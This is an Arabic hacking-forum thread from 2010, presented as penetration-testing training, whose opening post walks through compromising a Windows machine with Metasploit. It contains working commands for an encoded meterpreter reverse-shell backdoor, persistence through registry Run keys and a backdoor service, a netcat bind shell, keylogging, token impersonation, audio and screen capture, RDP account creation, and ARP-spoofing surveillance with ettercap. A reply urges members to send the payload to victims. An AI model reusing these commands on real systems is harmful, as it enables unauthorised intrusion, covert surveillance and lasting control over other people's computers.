التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > Penteration Testing Training

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 01-23-2010, 11:58 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية punisher77
 

 

 
إحصائية العضو





punisher77 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
punisher77 is on a distinguished road

افتراضي طريقك لاحتراف penetration testings


لندخل اولى عالم الهكر الحقيقي و خلونا من الباتشات واحد يقول لا أعرف استعمالها وبعدين يقول أن هكر ,الهكر هو ذلك الانسان الملم بجميع أساليب الجديدة المستخدمة في إختراق الأنظمة

بدأ مشروع ثغراmetasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع ****sploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا… بدأ مشروع ثغراتmetasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذاالمصدر

بعد هذا الشرح نبدأ بتشغيل virtualbox كما في الصورة التالية ومن يريد شرح تنصيب vbox على bt4 سأقوم بعمل شرح فيما بعد لمن يريد ذلك






في البداية سنقوم بعمل باكدور مشفر بمشروع المتسبلويت نذهب إلى مجلد المشروع


يمكن تختار واحدة الرابط

كود:
   ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe
كود:
 cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 R |  ./msfencode -c 10 -t exe -o /home/punisher/meter.exe
ننقل الباكدور إلى الألة الافتراضية كما في صورة



نقوم بتشغيل mfscli : واجهة أخرى تعمل من سطر الأوامر لكنها تختلف عن msfconsole بأنها ليست تفاعلية (Interactive) أي أننا لن نحتاج للدخول الى سطر أوامر المشروع وتنفيذ عدة أوامر لاستغلال الثغرة بل نستطيع القيام بذلك بتنفيذ أمر واحد فقط بعد تحديد الخيارات التي نريدها بشكل صحيح وهذا يفيدنا في استخدام المشروع من خلال Bash Script أو أي برنامج آخر
كود:
 ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E


بعد الاختراق خيارات meterpreter ، run persistence وهذ الخيار مهم يجعل لا نفقد الضحية
وهذه بعض خيارات Maintaining اكسس ولكن استخدمت في شرح :
كود:
 run persistence -h

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where metasploit is listening
    -r <opt>  The IP of the system running ****sploit listening for the connect back

meterpreter > run persistence -A -X -i 60 -p 4444 -r 192.168.0.69
[*] Creating a persistent agent: LHOST=192.168.0.69 LPORT=4444 (interval=60 onboot=true)[*] Persistent agent script is 731282 bytes long[*] Uploaded the persistent agent to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fjBnpFnjnN.vbs[*] Agent executed with PID 1948[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\IeDEEiTohfs[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\IeDEEiTohfs


Keylogging
كود:
 meterpreter > ps
500   MSTask.exe         C:\WINNT\system32\MSTask.exe                            
    528   VMwareService.exe  C:\Program Files\VMwareVMware Tools\VMwareService.exe  
    588   WinMgmt.exe        C:\WINNT\System32\WBEMWinMgmt.exe                      
    664   notepad.exe        C:\WINNT\System32\notepad.exe                           
    724   cmd.exe            C:\WINNT\System32\cmd.exe                               
    768   Explorer.exe       C:\WINNT\Explorer.exe 
meterpreter > migrate 768[*] Migrating to 768...[*] Migration completed successfully.
meterpreter > getpid
Current pid: 768
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes..
Meterpreter Backdoor Service
كود:
 meterpreter > ps

Process list
============

    PID   ****                 Path
    ---   ----                 ----
    132   ctfmon.exe           C:\WINDOWS\system32\ctfmon.exe
    176   svchost.exe          C:\WINDOWS\system32\svchost.exe
    440   VMwareService.exe    C:\Program Files\VMware\VMware Tools\VMwareService.exe
    632   Explorer.EXE         C:\WINDOWS\Explorer.EXE
    796   smss.exe
كود:
  meterpreter > migrate 632
run metsvc -h[*]
OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the service
    -h        This help menu
    -r        Uninstall an existing Meterpreter service (files must be deleted manually)
meterpreter > run metsvc[*] Creating a meterpreter service on port 31337[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...[*]  >> Uploading metsrv.dll...[*]  >> Uploading metsvc-server.exe...[*]  >> Uploading metsvc.exe...[*] Starting the service...[*]      * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

meterpreter >
Interacting with Metsvc

كود:
 
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 192.168.1.104
RHOST => 192.168.1.104
show options
exploit[*] Starting the payload handler...[*] Started bind handler[*] Meterpreter session 2 opened (192.168.1.101:60840 -> 192.168.1.104:31337)
ps
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server user****: NT AUTHORITY\SYSTEM
meterpreter >

************************************************** ************************************
Persistent Netcat Backdoor

كود:
  upload /tmp/nc.exe C:\\windows\\system32
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
execute -f cmd -i
C:\********s and Settings\Jim\My ********s> netsh firewall show opmode
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
netsh firewall show portopening


root@bt4:/pentest/exploits/framework3# nc -v 172.16.104.128 455
كم في صورة نجحنا في فتح بورت 455


Fun with Incognito
كود:
 meterpreter > use incognito
meterpreter >help
meterpreter >list_tokens -u
meterpreter >impersonate_token SNEAKS.IN\\Administrator
meterpreter > getuid
meterpreter > execute -f cmd.exe -i -t
C:\WINDOWS\system32>whoami
sound recoreder

كود:
 meterpreter >run soundrecorder -h
meterpreter >run soundrecorder -t 10
/root/.msf3/logs/soundrecord/
Enabling Remote Desktop

كود:
 run getgui -u hax0r -p gibs0n
rdesktop -u hax0r -p gibs0n 192.168.1.3
كما في صورة



screenshot

كود:
 meterpreter > ps
meterpreter > migrate 260[*] Migrating to 260...[*] Migration completed successfully.
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot /tmp/moo.bmp[*] Image saved to /tmp/moo.bmp
والأن نذهب إلى التجسس على الشبكة ببرنامج ettercap و-driftnet
فيديو يشرح استخدام برنامج Ettercap مع اضافة remote_browser لعمل arp spoofing والتقاط الروابط التي يتم فتحها بالشبكة مع برنامج Driftnet لعرض الصور التي يقوم المستخدمين بمشاهدته
لتشغيل البرامج نكتب في طرفية الأكواد التالية

كود:
 ettercap -T -q -M arp:remote -P remote_browser -i eth0 //

 driftnet -i eth0




ملاحظة كل ماهو ملون بالأحمر عبارة عن روابط شكراً الموضوع عملت سريعا لمزيد من الشرح ترك رد
الشرح مطبق على جهازي
مكان النجوم نكتب **** ميتا



'vdr; ghpjvht penetration testings

التوقيع

http://www.vbspiders.com/vb/members/...1-user7796.jpg

 


التعديل الأخير تم بواسطة punisher77 ; 01-24-2010 الساعة 12:04 AM.

   

رد مع اقتباس
قديم 01-24-2010, 03:59 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 01-24-2010, 07:24 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
Garwasha
قـرووشـه
 
الصورة الرمزية Garwasha
 

 

 
إحصائية العضو







Garwasha غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Garwasha is on a distinguished road

افتراضي


موفق بإذن الله ... لك مني أجمل تحية .

التوقيع


EMaiL DgX@hotmail.com
My BB PiN : 25FD66A2

 

   

رد مع اقتباس
قديم 01-24-2010, 03:01 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو






ThE BiGeSt JoKeR غير متواجد حالياً

إرسال رسالة عبر Skype إلى ThE BiGeSt JoKeR

 

 

إحصائية الترشيح

عدد النقاط : 10
ThE BiGeSt JoKeR is on a distinguished road

افتراضي


شكرا لك اخي ..
للمعلوميه ..الاخ شرح على باتش صنعه بالميتاسبلويت .. عن طريق البايلود meterpreter
هذا البايلود قوي جدا .. و يستعمل سطر الاوامر ..
بين الاخ الاوامر التي استعملها في الاختراق .. و طبق على جهازه الشخصي ..
انما على الاعضاء الذين يريدون تطبيق الشرح .. ان يرسلو البايلود الى الضحيه .. << رااجع دروس المجهوول

.............

الى اللقاء

التوقيع

انتبه ...
جيوش الـ Metasploit ستزور العناكب



نحن قوم لا نحب الغرور .. لكن الزمن سمح لنا بالتباهي .. لأننا ملوك


[/COLOR]

on vbspiders only

 

   

رد مع اقتباس
قديم 01-24-2010, 04:11 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 03-01-2010, 10:41 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Cyber Code
 

 

 
إحصائية العضو








Cyber Code غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Cyber Code is on a distinguished road

افتراضي


مشكووراخي الكريم واصل وإلا الامام

التوقيع

if i gain something from being a hacker
it would be a background of almost every beautiful dream

and if you asked me what did you gain from being a member here

i'll honestly answer , it's a brothers for life


سبحان الله العظيم , سبحان الله وبحمده
استغفر الله العلي العظيم وأتوب إليه

 

   

رد مع اقتباس
قديم 02-01-2014, 12:48 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية abdellatifai
 

 

 
إحصائية العضو







abdellatifai غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
abdellatifai is on a distinguished road

افتراضي رد: طريقك لاحتراف penetration testings


مشكووراخي الكريم واصل وإلا الامام

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ماهو ال : Penetration Test data$hack Penteration Testing Training 26 02-09-2020 04:46 AM
Penetration Testing ما هو؟ وكيف تبدأ طريقك به! D-GhosT s3cur!Ty-Z Penteration Testing Training 13 08-06-2016 06:36 PM
كل كتب ال Penetration Testing (متجدد). data$hack Penteration Testing Training 17 03-08-2011 10:02 AM
Penetration Test .... nikto أسدالله الدمشقي Penteration Testing Training 0 08-27-2010 03:07 PM
Penetration Testing ما هو؟ وكيف تبدأ طريقك به! KΛiSЄЯ-J Penteration Testing Training 7 02-05-2010 06:52 AM


الساعة الآن 04:16 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0